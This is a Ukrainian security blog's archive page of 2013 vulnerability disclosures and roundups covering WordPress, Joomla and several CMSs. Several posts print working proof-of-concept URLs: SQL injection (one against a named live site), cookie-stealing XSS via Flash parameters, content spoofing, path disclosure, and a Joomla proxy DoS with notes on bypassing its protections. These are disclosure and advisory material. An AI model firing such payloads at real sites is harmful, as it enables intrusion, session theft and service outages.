Архів для категорії 'Уразливості'

Добірка уразливостей

16:20 15.08.2013

В даній добірці уразливості в веб додатках:

  • HP Intelligent Management Center v5.1 E0202 topoContent.jsf Non-Persistent Cross-Site Scripting (деталі)
  • HP Intelligent Management Center (iMC), iMC TACACS+ Authentication Manager (TAM), and iMC User Access Manager (UAM), Cross Site Scripting (XSS), Remote Code Execution (деталі)
  • Magnolia CMS multiple access control vulnerabilities (деталі)
  • Multiple XSS Vulnerabilities in Xaraya (деталі)
  • SQL Injection in Dolphin (деталі)

Уразливість в Soltech.CMS

23:59 13.08.2013

05.06.2013

У травні, 26.05.2013, я знайшов SQL Injection уразливість в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

13.08.2013

SQL Injection (WASC-19):

http://site/index.php?level_path=%27%20or%20version()=5%23

Уразливі Soltech.CMS v 0.4 та попередні версії.

Уразливості на ufrnsb.kiev.ua

15:29 13.08.2013

15.01.2010

У березні, 04.03.2009, я знайшов Insufficient Anti-automation та SQL Injection уразливості на секюріті сайті http://ufrnsb.kiev.ua - сайті УФРНСБ (Українська федерація професіоналів безпеки). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.08.2013

Insufficient Anti-automation:

http://ufrnsb.kiev.ua/gostevaja_komnata.html

SQL Injection:

http://ufrnsb.kiev.ua/uscr/stand_forms.asp?form_type=-1%20or%20version()=5

SQL Injection уразливість вже виправлена, але IAA дірка досі не виправлена.

Уразливості в WPtouch і WPtouch Pro для WordPress

19:15 03.08.2013

17.04.2013

У березні, 15.03.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагінах WPtouch і WPtouch Pro для WordPress. Про що найближчим часом повідомлю розробникам.

Стосовно плагінів для WordPress раніше я писав про уразливості в Search and Share для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

03.08.2013

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/wp-content/plugins/wptouch-pro/admin/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wptouch/wptouch.php
http://site/wp-content/plugins/wptouch-pro/wptouch-pro.php

Та інші php-файли в папці плагіна та підпапках.

http://site/wp-content/plugins/wptouch/error_log
http://site/wp-content/plugins/wptouch-pro/error_log

В папці плагіна та підпапках (на сайтах, де відключене виведення помилок в php-файлах і вони записуються в error_log).

Уразливі всі версії WPtouch і WPtouch Pro для WordPress.

Уразливості в плагінах для WordPress №112

23:52 02.08.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах JS Restaurant, Spicy Blogroll та WooCommerce. Для котрих з’явилися експлоіти. JS Restaurant - це плагін для замовлення столику в ресторані, Spicy Blogroll - це плагін для покращення списку блогів, WooCommerce - це е-комерс плагін для створення онлайн-магазину.

  • WordPress JS Restaurant SQL Injection (деталі)
  • WordPress Spicy Blogroll Local File Inclusion (деталі)
  • WordPress WooCommerce 2.0.12 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:27 01.08.2013

В даній добірці уразливості в веб додатках:

  • HP ServiceCenter, Remote Denial of Service (DoS) (деталі)
  • Barnraiser Prairie OpenID idp: Directory traversal attack (деталі)
  • Joomla crypto vulnerability (all versions) (деталі)
  • Apache Geronimo 3 RMI classloader exposure (деталі)
  • HP LeftHand Virtual SAN Appliance hydra, Remote Execution of Arbitrary Code (деталі)

XSS та CS уразливості в aCMS

22:42 31.07.2013

24.05.2013

У квітні, 14.04.2013, я знайшов численні Cross-Site Scripting та Content Spoofing уразливості в aCMS. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в aCMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

31.07.2013

Cross-Site Scripting (WASC-08):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Вразливі aCMS 1.0 та попередні версії.

DoS і XSS уразливості в Googlemaps для Joomla

23:57 29.07.2013

У липні, 26.07.2013, я знайшов Denial of Service та Cross-Site Scripting уразливості в Googlemaps плагіні для Joomla. Про що вже повідомив розробнику веб додатку.

Раніше я вже писав про численні уразливості в Googlemaps для Joomla. Розробник виправив попередні дірки й переробив проксі функціонал у версії 3.2 плагіна. Але як я перевірив, в ній наявні DoS і XSS уразливості.

Для обходу захисту для доступу до скрипта потрібно вказати реферер (що рівний поточному сайту), кукіс (сесійний, що встановлюється Джумлою) і токена (що береться зі сторінки сайта з плагіном і встановлюється в URL). Ці дані можуть бути взяті з сайту автоматично.

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=google.com&1e17f7d3d74903775e5c524dbe2cd8f1=1

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Уразлива версія Googlemaps plugin v3.2 для Joomla.

Уразливості в плагінах для WordPress №111

23:52 20.07.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Feed, Category-Grid-View-Gallery та WordPress Booking System. Для котрих з’явилися експлоіти. Feed - це плагін для керування RSS-фідами на сайті, Category-Grid-View-Gallery - це плагін для створення галерей зображень, WordPress Booking System - це система продажу білетів.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:13 20.07.2013

В даній добірці уразливості в веб додатках: